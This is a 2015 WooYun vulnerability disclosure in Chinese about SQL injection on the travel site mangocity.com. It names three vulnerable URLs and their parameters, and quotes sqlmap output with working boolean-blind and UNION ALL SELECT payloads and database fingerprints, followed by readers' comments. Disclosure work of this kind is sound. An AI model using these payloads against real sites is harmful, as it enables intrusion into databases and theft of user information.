缺陷编号:WooYun-2015-0123486
漏洞标题:芒果网主站多处SQL注入(涉及用户信息)
相关厂商:芒果网
漏洞作者:路人甲
提交时间:2015-06-29 16:39
公开时间:2015-07-04 16:40
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:1
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-04: 厂商已经主动忽略漏洞,细节向公众公开
测试系统?
1、
1 |
http://www.mangocity.com/product/10506752p2.html?type=90&c=cholidayindexcontroller&m=comindex&d=grouptravel |
1 2 3 4 5 6 7 8 9 |
Parameter: type (GET)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: type=90 AND 1217=1217&c=cholidayindexcontroller&m=comindex&d=grouptravelType: UNION query<br> Title: MySQL UNION query (60) - 9 columns<br> Payload: type=-3025 UNION ALL SELECT 60,60,60,CONCAT(0x716b626a71,0x77445276794465757461,0x716a627871),60,60,60,60,60#&c=cholidayindexcontroller&m=comindex&d=grouptravel<br> ---<br> web application technology: PHP 5.3.28<br> back-end DBMS: MySQL >= 5.0.0 |
2、
3、
1 |
http://www1.mangocity.com/alliance/9953/600003/index.php?thirdpartid=100003295p2&c=productinfo_controller&m=index&d=freeline |
参数thirdpartid
1 |
http://www.mangocity.com/index.php?fp=304%3A1&c=destination_controller&d=grouptravel&keyword=%E6%B5%99%E6%B1%9F&m=index&type=1 |
参数fp
危害等级:无影响厂商忽略
忽略时间:2015-07-0416:40
暂无
哥 为嘛 中午和现在的都上首页啦 怎么我的是小厂商 不都是注入吗
@牛 小 帅 大概是人家懂得低调吧
@Me_Fortune 表示好委屈 我小菜鸟容易嘛
卧槽怎么忽略了,[email protected]
@牛 小 帅 上首页真的很重要吗
原文连接
的情况下转载,若非则不得使用我方内容。